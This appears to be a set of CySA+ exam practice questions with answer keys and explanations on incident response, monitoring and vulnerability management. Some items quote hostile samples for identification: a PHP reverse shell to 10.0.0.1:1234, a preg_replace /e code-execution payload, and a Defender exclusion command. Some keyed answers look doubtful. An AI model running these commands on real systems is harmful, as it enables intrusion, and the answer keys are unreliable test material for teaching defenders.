The actions described—implementing host-based IPS (Intrusion Prevention Systems), firewalls, and two-factor authentication—are measures to protect and secure a computer system from vulnerabilities and unauthorized access.

These measures are most likely related to System hardening. System hardening involves implementing security measures to reduce the potential attack surface of a system, which is consistent with the deployment of the security controls mentioned.

157
Q

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

A. Offline storage
B. Evidence collection
C. Integrity validation
D. Legal hold

A

Correct Answer: C

This process typically involves using cryptographic hashes to verify that the data has not been altered, ensuring its authenticity and integrity. Offline storage, evidence collection, and legal hold are also important aspects of handling digital evidence, but integrity validation is key to preventing repudiation.

158
Q

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

A. The NTP server is not configured on the host
B. The cybersecurity analyst is looking at the wrong information
C. The firewall is using UTC time
D. The host with the logs is offline

A

Correct Answer: A

Given the scenario, the most likely explanation for the discrepancy in time stamps is:

A. The NTP server is not configured on the host

This is because a 43-minute difference suggests a significant time drift, which is often due to the host not being synchronized with a Network Time Protocol (NTP) server. Proper NTP configuration ensures that all devices on the network have synchronized time, which is crucial for accurate log correlation and incident analysis.

159
Q

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?

A. Scan the employee’s computer with virus and malware tools
B. Review the actions taken by the employee and the email related to the event
C. Contact human resources and recommend the termination of the employee
D. Assign security awareness training to the employee involved in the incident

A

Correct Answer: B

One of the first actions the incident response team should take when they receive notification of a phishing attack is to review the actions taken by the employee and the email related to the event (Option B).

This step is crucial for understanding the scope of the incident, identifying any potential security breaches, and gathering evidence for further investigation.

160
Q

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:

  • DNS traffic while a tunneling session is active.
  • The mean time between queries is less than one second.
  • The average query length exceeds 100 characters.

Which of the following attacks most likely occurred?

A. DNS exfiltration
B. DNS spoofing
C. DNS zone transfer
D. DNS poisoning

A

Correct Answer: A

Given the characteristics of the suspicious DNS traffic you described, the most likely attack is DNS exfiltration (A).

  • DNS traffic during a tunneling session: This suggests that DNS is being used to tunnel data.
  • Mean time between queries is less than one second: This indicates a high frequency of DNS queries, which is unusual for normal DNS traffic.
  • Average query length exceeds 100 characters: This suggests that the DNS queries are carrying more data than typical DNS queries, which is a common sign of data exfiltration.

DNS exfiltration involves using DNS queries and responses to transfer data covertly from a compromised system to an attacker-controlled server. This method leverages the DNS protocol to bypass traditional security measures.

161
Q

A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

A. Corrective controls
B. Compensating controls
C. Operational controls
D. Administrative controls

A

Correct Answer: B

The CISO implemented B. Compensating controls.

Compensating controls are alternative measures put in place to satisfy the requirement for a security control when the primary control is not feasible. In this case, maintaining and reviewing logs and audit trails compensates for the lack of staff to segregate duties

162
Q

During the log analysis phase, the following suspicious command is detected:

<?php preg_replace(‘/./e’, ‘system(“ping -c 4 10.0.0.1”);’, ‘’); ?>

Which of the following is being attempted?

A. Buffer overflow
B. RCE
C. ICMP tunneling
D. Smurf attack

A

Correct Answer: B

The suspicious command you provided is attempting to execute a system command through PHP code. This is indicative of a Remote Code Execution (RCE) attempt.

preg_replace(‘/./e’, ‘system(“ping -c 4 10.0.0.1”);’, ‘’);:
- The preg_replace function is used for regular expression-based search and replace.
- The /e modifier in the regular expression tells PHP to evaluate the replacement string as PHP code.

system(“ping -c 4 10.0.0.1”);:
- The system function in PHP executes an external program (in this case, the ping command) and displays the output.

Evaluation:
- The /e modifier causes the replacement string (system(“ping -c 4 10.0.0.1”);) to be executed as PHP code.
- This means that the system function will run the ping command, effectively allowing the execution of arbitrary system commands.

This combination of using preg_replace with the /e modifier and the system function is a classic example of an RCE vulnerability, where an attacker can execute arbitrary commands on the server.

163
Q

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

A. DKIM
B. SPF
C. SMTP
D. DMARC

A

Correct Answer: B

To ensure emails from the new data center do not get blocked by spam filters, the most likely record that needs to be updated is the SPF (Sender Policy Framework) record.

SPF records specify which IP addresses are authorized to send emails on behalf of your domain, and updating it with the new public IP addresses of the data center will help prevent emails from being marked as spam.

164
Q

A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?

A. XDR logs
B. Firewall legs
C. IDS logs
D. MFA logs

A

Correct Answer: A

Extended Detection and Response (XDR) logs provide a comprehensive view of enterprise activity by collecting and correlating data across multiple security layers, such as email, endpoint, server, cloud workloads, and network.

This makes XDR logs the most effective source for confirming malware infections.

165
Q

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

A. To provide metrics and test continuity controls
B. To verify the roles of the incident response team
C. To provide recommendations for handling vulnerabilities
D. To perform tests against implemented security controls

A

Correct Answer: A

The goal of a disaster recovery exercise is primarily to provide metrics and test continuity controls. This helps ensure that an organization can maintain operations during and after a disaster by validating the effectiveness of its continuity plans and identifying areas for improvement.

So, the correct answer is A. To provide metrics and test continuity controls.

166
Q

A security analyst has prepared a vulnerability scan that contains all of the company’s functional subnets. During the initial scan users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?

A. Perform non-credentialed scans
B. Ignore embedded web server ports
C. Create a tailored scan for the printer subnet
D. Increase the threshold length of the scan timeout

A

Correct Answer: C

To prevent network printers from printing unreadable text and icons during subsequent vulnerability scans, the analyst should create a tailored scan for the printer subnet (Option C). This approach allows the analyst to customize the scan settings specifically for the printer subnet, avoiding unnecessary disruptions to the printers while still ensuring a thorough vulnerability assessment.

167
Q

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:

  • Must use minimal network bandwidth
  • Must use minimal host resources
  • Must provide accurate, near real-time updates
  • Must not have any stored credentials in configuration on the scanner

Which of the following vulnerability scanning methods should be used to best meet these requirements?

A. Internal
B. Agent
C. Active
D. Uncredentialed

A

Correct Answer: B

Given the requirements outlined by the Chief Information Security Officer, the best vulnerability scanning method to use would be B. Agent.

  • Minimal network bandwidth: Agent-based scanning typically uses less network bandwidth because the agents run locally on the hosts and only send the results back to the central server.
  • Minimal host resources: Modern agents are designed to be lightweight and have minimal impact on host resources.
  • Accurate, near real-time updates: Agents can provide continuous monitoring and real-time updates as they are always running on the host.
  • No stored credentials: Agent-based scanning does not require stored credentials on the scanner, as the agents have the necessary permissions to perform scans on their respective hosts.

This method aligns well with the requirements for minimal network and host resource usage, real-time updates, and no stored credentials.

168
Q

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?

A. RFI
B. LFI
C. CSRF
D. XSS

A

Correct Answer: C

Given the scenario where an employee is unable to log in after updating their browser and typically has multiple tabs open, the most likely attack is C. CSRF (Cross-Site Request Forgery).

CSRF attacks exploit the trust that a site has in a user’s browser. When a user is authenticated and has multiple tabs open, an attacker can trick the browser into making unauthorized requests to a different site where the user is authenticated. This can lead to actions being performed without the user’s consent, such as changing account settings or making transactions.

169
Q

Which of the following does “federation” most likely refer to within the context of identity and access management?

A. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access
B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains
C. Utilizing a combination of what you know who you are, and what you have to grant authentication to a user
D. Correlating one’s identity with the attributes and associated applications the user has access to

A

Correct Answer: B

Federation enables single sign-on (SSO) across multiple domains, enhancing user experience and security by allowing users to access various resources with a single set of credentials.

A. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access - This describes role-based access control (RBAC) rather than federation.

B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains - This is the correct definition of federation. It allows users to access multiple systems or domains using a single set of credentials, often through single sign-on (SSO).

C. Utilizing a combination of what you know who you are, and what you have to grant authentication to a user - This describes multi-factor authentication (MFA), which involves using multiple methods to verify a user’s identity.

D. Correlating one’s identity with the attributes and associated applications the user has access to. This is more aligned with identity management and attribute-based access control (ABAC), not specifically federation.

170
Q

The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled.

Which of the following should the organization utilize to best centralize the workload for the internal security team? (Choose two)

A. SOAR
B. SIEM
C. MSP
D. NGFW
E. XDR
F. DLP

A

Correct Answer: A, B

To best centralize the workload for the internal security team after the installation of a new EDR solution, the organization should utilize SOAR and SIEM.

A. SOAR (Security Orchestration, Automation, and Response)
- Automation: SOAR platforms can automate repetitive tasks, such as alert triage and incident response, reducing the manual workload on analysts.
- Orchestration: They integrate with various security tools, including EDR, to streamline and coordinate responses across different systems.
- Response: SOAR can help in creating playbooks for common incidents, ensuring consistent and efficient handling of alerts.

B. SIEM (Security Information and Event Management)
- Centralized Logging: SIEM solutions collect and analyze log data from multiple sources, including EDR, providing a centralized view of security events.
- Correlation: They correlate events from different sources to identify potential threats, reducing the number of false positives and prioritizing alerts that need immediate attention.
- Real-time Monitoring: SIEM provides real-time monitoring and alerting, helping analysts to quickly identify and respond to incidents.

These tools together can significantly enhance the efficiency and effectiveness of the internal security team by automating processes and providing a centralized view of security events.

C. MSP (Managed Service Provider)
- Outsourcing: MSPs provide outsourced IT services, including security. While they can help manage security tasks,* they don’t centralize the workload internally. Instead, they shift it to an external provider, which might not align with the goal of centralizing within the internal team*.

D. NGFW (Next-Generation Firewall)
Network Security: NGFWs focus on network security by providing advanced filtering capabilities, intrusion prevention, and application awareness. They don’t centralize or manage alerts from EDR solutions or other security tools, so they wouldn’t help in reducing the internal team’s workload.

E. XDR (Extended Detection and Response)
- Integration: XDR integrates multiple security products into a unified platform, which can help in detecting and responding to threats. However, it might overlap with the existing EDR solution and doesn’t specifically centralize the workload for the internal team as effectively as SOAR and SIEM.

F. DLP (Data Loss Prevention)
- Data Protection: DLP solutions focus on preventing data breaches by monitoring and controlling data transfers. While important, they don’t centralize or manage alerts from EDR solutions, so they wouldn’t address the increased workload on the internal security team.

171
Q

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

A. Hacktivist threat
B. Advanced persistent threat
C. Unintentional insider threat
D. Nation-state threat

A

Correct Answer: C

Unintentional insider threat. This concept involves ensuring that network users only open attachments from known sources to prevent accidental exposure to malicious content. This type of threat arises when employees or users unintentionally compromise security, often due to a lack of awareness or training.

172
Q

A security analyst has received an incident case regarding malware spreading out of control on a customer’s network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature.

Which of the following should the analyst perform next to determine the type of malware based on its telemetry?

A. Cross-reference the signature with open-source threat intelligence.
B. Configure the EDR to perform a full scan.
C. Transfer the malware to a sandbox environment.
D. Log in to the affected systems and run netstat.

A

Correct Answer: A

Open-source threat intelligence can help determine the type of malware based on its telemetry.

By cross-referencing the malware’s signature and behavioral patterns with known threat intelligence databases, analysts can quickly identify if the malware matches any known threats. This process can provide valuable insights into the malware’s characteristics, origin, and potential impact.

However, while open-source threat intelligence is a powerful tool for initial identification, it may not always provide a complete picture, especially for new or highly sophisticated malware. In such cases, additional analysis, such as running the malware in a sandbox environment, is necessary to fully understand its behavior and develop effective countermeasures.

173
Q

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?

A. A local red team member is enumerating the local RFC1918 segment to enumerate hosts
B. A threat actor has a foothold on the network and is sending out control beacons
C. An administrator executed a new database replication process without notifying the SOC
D. An insider threat actor is running Responder on the local segment, creating traffic replication

A

Correct Answer: C

Given the specifics of the scenario, the most likely cause of the spike in traffic on port 1433 (which is commonly used by Microsoft SQL Server) is:

C. An administrator executed a new database replication process without notifying the SOC

This is because port 1433 is typically associated with database activities, and a significant increase in traffic could indicate a large data transfer, such as a database replication process. This scenario fits well with the observed traffic pattern and the nature of the port involved.

174
Q

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

A. Risk register
B. Vulnerability assessment
C. Penetration test
D. Compliance report

A

Correct Answer: A

A. Risk Register
- Purpose: A risk register is a comprehensive tool used to document identified risks, their likelihood, impact, and the actions taken to mitigate them.
- Usefulness: It helps in mapping, tracking, and managing threats and vulnerabilities effectively. It provides a structured approach to risk management, ensuring that all potential risks are accounted for and addressed.
* Relevance to CySA+: Highly relevant, as it aligns with the exam’s focus on risk management and mitigation strategies.

B. Vulnerability Assessment
- Purpose: A vulnerability assessment is a systematic process of identifying, quantifying, and prioritizing vulnerabilities in a system.
- Usefulness: It helps in identifying security weaknesses that could be exploited by attackers. It provides a snapshot of the current security posture and highlights areas that need improvement.
- Relevance to CySA+: Important for understanding the identification and prioritization of vulnerabilities, but it doesn’t directly map, track, or mitigate risks in the same structured way as a risk register.

C. Penetration Test
- Purpose: A penetration test (or pen test) is an authorized simulated attack on a computer system to evaluate its security.
- Usefulness: It helps in identifying vulnerabilities that could be exploited in a real attack scenario. It provides a practical assessment of the system’s defenses.
- Relevance to CySA+: Crucial for understanding real-world attack scenarios and defenses, but it focuses more on identifying vulnerabilities rather than tracking and mitigating them over time.

D. Compliance Report
- Purpose: A compliance report documents an organization’s adherence to regulatory requirements and standards.
- Usefulness: It helps in ensuring that the organization meets legal and regulatory requirements. It provides evidence of compliance to auditors and stakeholders.
- Relevance to CySA+: Important for understanding regulatory requirements and compliance, but it doesn’t focus on the ongoing management of threats and vulnerabilities.

Conclusion
While all these tools are important in the field of cybersecurity, the risk register is the most comprehensive tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence.

175
Q

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

A. Log retention
B. Log rotation
C. Maximum log size
D. Threshold value

A

Correct Answer: D

Threshold values are often used to manage the number of alerts by setting specific criteria that must be met before an alert is triggered. This helps in reducing the noise and focusing on the most critical events.

176
Q

While reviewing web server logs, a security analyst discovers the following suspicious line:

php -r ’$socket=fsockopen(“10.0.0.1”, 1234); passthru (“/bin/sh -i <&3 >&3 2>&3”);’

Which of the following is being attempted?

A. Remote file inclusion
B. Command injection
C. Server-side request forgery
D. Reverse shell

A

Correct Answer: D

The suspicious line of code is attempting a Reverse Shell (Option D). Here’s how you can tell:

  • fsockopen(“10.0.0.1”, 1234): This function is used to open a network connection to the IP address 10.0.0.1 on port 1234. This is indicative of an attempt to establish a connection back to an attacker’s machine.
  • passthru (“/bin/sh -i <&3 >&3 2>&3”): This command executes a shell (/bin/sh) and redirects the input, output, and error streams to the network connection established by fsockopen. This effectively gives the attacker a shell on the compromised machine.

A reverse shell allows an attacker to gain remote access to the target system by having the target system initiate a connection back to the attacker’s machine.

177
Q

Which of the following should be updated after a lessons-learned review?

A. Disaster recovery plan
B. Business continuity plan
C. Tabletop exercise
D. Incident response plan

A

Correct Answer: D

After a lessons-learned review, the Incident Response Plan (D) should be updated. This ensures that any insights gained from the incident are incorporated into the plan, improving future responses and minimizing the impact of similar incidents.

178
Q

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?

A. Perform static analyses using an integrated development environment
B. Deploy compensating controls into the environment
C. Implement server-side logging and automatic updates
D. Conduct regular code reviews using OWASP best practices

A

Correct Answer: C

While D. Conduct regular code reviews using OWASP best practices is indeed a valuable practice for identifying and mitigating security vulnerabilities, it doesn’t directly address the specific issue of insufficient logging capabilities.

Here’s a breakdown:

  • Code Reviews (Option D): These are essential for catching a wide range of security issues and ensuring that the code adheres to best practices. However, they are more focused on the quality and security of the code itself rather than on operational aspects like logging and monitoring.
  • Server-Side Logging (Option C): This directly targets the problem of insufficient logging by ensuring that all relevant events and activities are logged on the server. This is crucial for detecting and responding to security incidents. Automatic updates further enhance security by ensuring that the latest patches and fixes are applied promptly.

In summary, while code reviews are important for overall code quality and security, implementing server-side logging and automatic updates is more directly aligned with addressing the specific risk of insufficient logging capabilities.

179
Q

An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst’s investigation?

A. OpenVAS
B. Angry IP Scanner
C. Wireshark
D. Maltego

A

Correct Answer: C

For investigating cleartext passwords being sent over the network, the best tool would be C. Wireshark. Wireshark is a network protocol analyzer that allows you to capture and inspect the data traveling through a network in real-time, making it ideal for identifying cleartext passwords and other sensitive information.

180
Q

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization’s endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor’s actions?

A. Delivery
B. Reconnaissance
C. Exploitation
D. Weaponization

A

Correct Answer: D

The threat actor’s actions of compiling and testing a malicious downloader to evade detection align best with the Weaponization stage of the Cyber Kill Chain. In this stage, the attacker creates a deliverable payload (in this case, the malicious downloader) using the information gathered during the Reconnaissance phase.

181
Q

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?

A. CIS Benchmarks
B. PCI DSS
C. OWASP Top Ten
D. ISO 27001

A

Correct Answer: A

CIS (Center for Internet Security) Benchmarks are a set of best practices for securing IT systems and data. They provide detailed, consensus-driven configuration guidelines for various technologies, including cloud services, which are highly relevant for creating secure server images.

182
Q

Which of the following stakeholders are most likely to receive a vulnerability scan report? (Choose two)

A. Executive management
B. Law enforcement
C. Marketing
D. Legal
E. Product owner
F. Systems administration

A

Correct Answer: A, F

A. Executive management: They need to be aware of the overall security posture and any significant risks that could impact the organization at a strategic level.

F. Systems administration: They are directly responsible for managing and securing the IT infrastructure, and they need detailed information to address and remediate vulnerabilities.

183
Q

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

A. Enrich the SIEM-ingested data to include all data required for triage
B. Schedule a task to disable alerting when vulnerability scans are executing
C. Filter all alarms in the SIEM with low seventy
D. Add a SOAR rule to drop irrelevant and duplicated notifications

A

Correct Answer: D

Add a SOAR rule to drop irrelevant and duplicated notifications

This approach leverages Security Orchestration, Automation, and Response (SOAR) to automate the process of filtering out unnecessary alerts, which can significantly reduce the workload on analysts by eliminating noise and focusing on actionable alerts.

184
Q

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?

A. The finding is a false positive and should be ignored.
B. A rollback had been executed on the instance.
C. The vulnerability scanner was configured without credentials.
D. The vulnerability management software needs to be updated.

A

Correct Answer: B

A rollback is the most likely cause because it can revert a system to a previous state, potentially reintroducing vulnerabilities that were previously fixed. Here’s a bit more detail:

  • Rollback Mechanism: When a rollback is executed, it restores the system to a prior configuration or state. If the rollback point is before the vulnerability was remediated, the vulnerability will reappear.
  • Common Scenario: This is a common scenario in environments where updates or changes are frequently made and sometimes need to be undone due to issues or errors.
  • False Positives and Scanner Configuration: While false positives and scanner configuration issues can occur, they are less likely to be the cause if the vulnerability was confirmed as remediated previously.
  • Software Updates: The need for software updates is also a valid consideration, but it typically affects the detection capabilities rather than reintroducing a known vulnerability.
185
Q

During an incident in which a user machine was compromised, an analyst recovered a binary file that potentially caused the exploitation. Which of the following techniques could be used for further analysis?

A. Fuzzing
B. Static analysis
C. Sandboxing
D. Packet capture

A

Correct Answer: B

Static Analysis involves examining the binary file without executing it. This can help identify malicious code, understand its functionality, and detect any embedded threats.

186
Q

A leader on the vulnerability management team is trying to reduce the team’s workload by automating some simple but time-consuming tasks. Which of the following activities should the team leader consider first?

A. Assigning a custom recommendation for each finding
B. Analyzing false positives
C. Rendering an additional executive report
D. Regularly checking agent communication with the central console

A

Correct Answer: D

If the primary goal is to automate a simple but time-consuming task, then regularly checking agent communication with the central console (Option D) could indeed be a better option. This task is straightforward and can be easily automated, freeing up the team’s time for more complex activities.

Analyzing false positives (Option B), while also time-consuming, involves more complexity and may require more sophisticated automation solutions, such as machine learning algorithms.

So, for a quick win in reducing workload through automation, Option D might be the more practical choice.

187
Q

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?

A. PCI DSS
B. COBIT
C. ISO 27001
D. ITIL

A

Correct Answer: C

ISO 27001 is an internationally recognized standard for information security management systems (ISMS). It helps organizations manage and protect their information assets, ensuring that they remain secure and demonstrating a commitment to information security to stakeholders.

188
Q

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?

A. Enabling a user account lockout after a limited number of failed attempts
B. Installing a third-party remote access tool and disabling RDP on all devices
C. Implementing a firewall block for the remote system’s IP address
D. Increasing the verbosity of log-on event auditing on all devices

A

Correct Answer: A

This control directly addresses the issue by preventing further attempts after a certain number of failures, thereby mitigating the risk of a successful brute-force attack. This is a common and effective method to protect against such attacks, as it limits the attacker’s ability to continue trying different passwords.

189
Q

An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on its infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause? (Choose two.)

A. Creation time of dropper
B. Registry artifacts
C. EDR data
D. Prefetch files
E. File system metadata
F. Sysmon event log

A

Correct Answer: B, E

Given the malware’s behavior of disabling host security services (including EDR) and performing cleanup routines, B. Registry artifacts and E. File system metadata would indeed be the most reliable sources of evidence.

B. Registry artifacts
- Why: Registry artifacts can provide persistent evidence of changes made by the malware, such as modifications to startup entries, service configurations, and other system settings. These artifacts are less likely to be completely erased by the malware’s cleanup routines.

E. File system metadata
- Why: File system metadata can reveal information about the creation, modification, and access times of files, which can help trace the timeline of the malware’s activities. Even if the initial dropper is deleted, metadata about its creation and deletion can still provide valuable clues.

Given the malware’s ability to disable EDR and remove event log entries and prefetch files, these two sources (registry artifacts and file system metadata) are more likely to retain useful evidence for root cause analysis.

190
Q

When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

A. CASB
B. SASE
C. ZTNA
D. SWG

A

Correct Answer: A

For a cloud migration project involving multiple SaaS applications, the service model that would help reduce the complexity of extending identity and access management (IAM) to cloud-based assets is CASB (Cloud Access Security Broker).

CASB solutions provide visibility and control over cloud applications, enforce security policies, and help integrate IAM across on-premises and cloud environments. This makes it easier to manage access and security consistently across all assets.

191
Q

A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly document the incident?

A. Back up the configuration file for all network devices.
B. Record and validate each connection.
C. Create a full diagram of the network infrastructure.
D. Take photos of the impacted items.

A

Correct Answer: D

Photos provide a visual record of the scene as it was found. This can be critical for forensic analysis and for understanding the extent of the damage or tampering.

192
Q

A cybersecurity analyst is participating with the DLP project team to classify the organization’s data. Which of the following is the primary purpose for classifying data?

A. To identify regulatory compliance requirements
B. To facilitate the creation of DLP rules
C. To prioritize IT expenses
D. To establish the value of data to the organization

A

Correct Answer: D

Classifying data helps an organization understand the importance and sensitivity of its data, which in turn informs how it should be protected and managed. This classification is crucial for determining the appropriate security measures and controls to apply.

193
Q

A security analyst observed the following activity from a privileged account:

  • Accessing emails and sensitive information
  • Audit logs being modified
  • Abnormal log-in times

Which of the following best describes the observed activity?

A. Irregular peer-to-peer communication
B. Unauthorized privileges
C. Rogue devices on the network
D. Insider attack

A

Correct Answer: D

The observed activity from the privileged account, including accessing emails and sensitive information, modifying audit logs, and abnormal log-in times, best describes an insider attack (Option D). This type of attack involves someone within the organization, often with legitimate access, misusing their privileges to perform malicious activities.

194
Q

A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%. Which of the following best describes how the security analyst can effectively review the malware without compromising the organization’s network?

A. Utilize an RDP session on an unused workstation to evaluate the malware.
B. Disconnect and utilize an existing infected asset off the network.
C. Create a virtual host for testing on the security analyst workstation.
D. Subscribe to an online service to create a sandbox environment.

A

Correct Answer: D

Using an online sandbox environment allows the security analyst to safely analyze the malware in an isolated setting, preventing any potential spread or impact on the organization’s network. This approach is particularly effective for polymorphic malware with conditional triggers, as it ensures the malware’s behavior can be observed without risking further infection.

194
Q

A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities should have the highest priority for the mitigation process?

A. A vulnerability that has related threats and IoCs, targeting a different industry
B. A vulnerability that is related to a specific adversary campaign, with IoCs found in the SIEM
C. A vulnerability that has no adversaries using it or associated IoCs
D. A vulnerability that is related to an isolated system, with no IoCs

A

Correct Answer: B

This is because the presence of Indicators of Compromise (IoCs) in the Security Information and Event Management (SIEM) system indicates active exploitation or targeting by adversaries, making it a more immediate threat to the organization.

195
Q

Which of the following would an organization use to develop a business continuity plan?

A. A diagram of all systems and interdependent applications
B. A repository for all the software used by the organization
C. A prioritized list of critical systems defined by executive leadership
D. A configuration management database in print at an off-site location

A

Correct Answer: C

This is because a business continuity plan (BCP) focuses on maintaining essential functions during and after a disaster. Identifying and prioritizing critical systems ensures that the most important operations are restored first, minimizing disruption to the organization.

195
Q

The management team requests monthly KPI reports on the company’s cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?

A. Employee turnover
B. Intrusion attempts
C. Mean time to detect
D. Level of preparedness

A

Correct Answer: C

The correct KPI to identify how long a security threat goes unnoticed in the environment is C. Mean time to detect (MTTD). This metric measures the average time it takes for the security team to become aware of a threat after it has entered the environment. It’s a crucial indicator of the effectiveness of your detection capabilities.

195
Q

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

A. Review of security requirements
B. Compliance checks
C. Decomposing the application
D. Security by design

A

Correct Answer: C

A. Review of security requirements
- This involves ensuring that the security requirements are clearly defined and understood. While it’s an important step in the overall security process, it is not specifically part of the threat modeling procedures in the OWASP Web Security Testing Guide.

B. Compliance checks
- Compliance checks are about verifying that the application meets certain regulatory and policy requirements. This is crucial for maintaining legal and organizational standards but is not a direct part of the threat modeling process in the OWASP guide.

C. Decomposing the application
- This is a key step in threat modeling where the application is broken down into smaller components to understand its structure and identify potential security weaknesses. This procedure is indeed part of the OWASP Web Security Testing Guide.

D. Security by design
- Security by design refers to integrating security principles and practices into the design phase of the application development lifecycle. While this is a best practice for building secure applications, it is not specifically listed as a threat modeling procedure in the OWASP guide.

196
Q

Which of the following best describes the key elements of a successful information security program?

A. Business impact analysis, asset and change management, and security communication plan
B. Security policy implementation, assignment of roles and responsibilities, and information asset classification
C. Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies
D. Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems

A

Correct Answer: B

These elements are fundamental to establishing a robust security framework, ensuring that policies are enforced, roles are clearly defined, and assets are properly classified to protect sensitive information.

197
Q

A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been compromised. Which of the following steps should the administrator take next?

A. Inform the internal incident response team.
B. Follow the company’s incident response plan.
C. Review the lessons learned for the best approach.
D. Determine when the access started.

A

Correct Answer: B

This step ensures that the response to the incident is structured, consistent, and aligns with the organization’s policies and procedures. It typically includes informing the internal incident response team, but following the plan ensures all necessary steps are taken in the correct order.

198
Q

Which of the following is a nation-state actor least likely to be concerned with?

A. Detection by MITRE ATT&CK framework.
B. Detection or prevention of reconnaissance activities.
C. Examination of its actions and objectives.
D. Forensic analysis for legal action of the actions taken.

A

Correct Answer: D

Nation-state actors typically operate with the backing of their governments, often making them less concerned about legal repercussions compared to other threat actors. Their primary focus is usually on achieving their strategic objectives while evading detection and maintaining operational security.

199
Q

During an incident, a security analyst discovers a large amount of PII has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee’s personal email. Which of the following should the analyst recommend be done first?

A. Place a legal hold on the employee’s mailbox.
B. Enable filtering on the web proxy.
C. Disable the public email access with CASB.
D. Configure a deny rule on the firewall.

A

Correct Answer: A

In this scenario, the first step the analyst should recommend is A. Place a legal hold on the employee’s mailbox. This action ensures that all email communications are preserved and can be reviewed during the investigation. It helps in maintaining the integrity of the evidence and supports any potential legal actions or compliance requirements.

200
Q

Which of the following is a commonly used four-component framework to communicate threat actor behavior?

A. STRIDE
B. Diamond Model of Intrusion Analysis
C. Cyber Kill Chain
D. MITRE ATT&CK

A

Correct Answer: B

The correct answer is B. Diamond Model of Intrusion Analysis. This model is a commonly used four-component framework to communicate threat actor behavior. It provides a structured method of describing and analyzing intrusions.

201
Q

An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high volume of random DNS queries begin to originate from the system. An investigation on the system reveals the following:

Add-MpPreference –ExclusionPath ‘%Program Files%\ksyconfig’

Which of the following is possibly occurring?

A. Persistence
B. Privilege escalation
C. Credential harvesting
D. Defense evasion

A

Correct Answer: D

The command:

Add-MpPreference –ExclusionPath ‘%Program Files%\ksyconfig’

is used to add an exclusion path to Windows Defender, which means that any files or activities within that path will not be scanned or monitored by the antivirus software. This is a common technique used by malware to avoid detection and continue its malicious activities undetected.

The high volume of random DNS queries suggests that the system might be communicating with a command-and-control server or performing other malicious activities, which further supports the idea of defense evasion.

201
Q

An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?

A. Creating a playbook denoting specific SLAs and containment actions per incident type
B. Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs
C. Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders
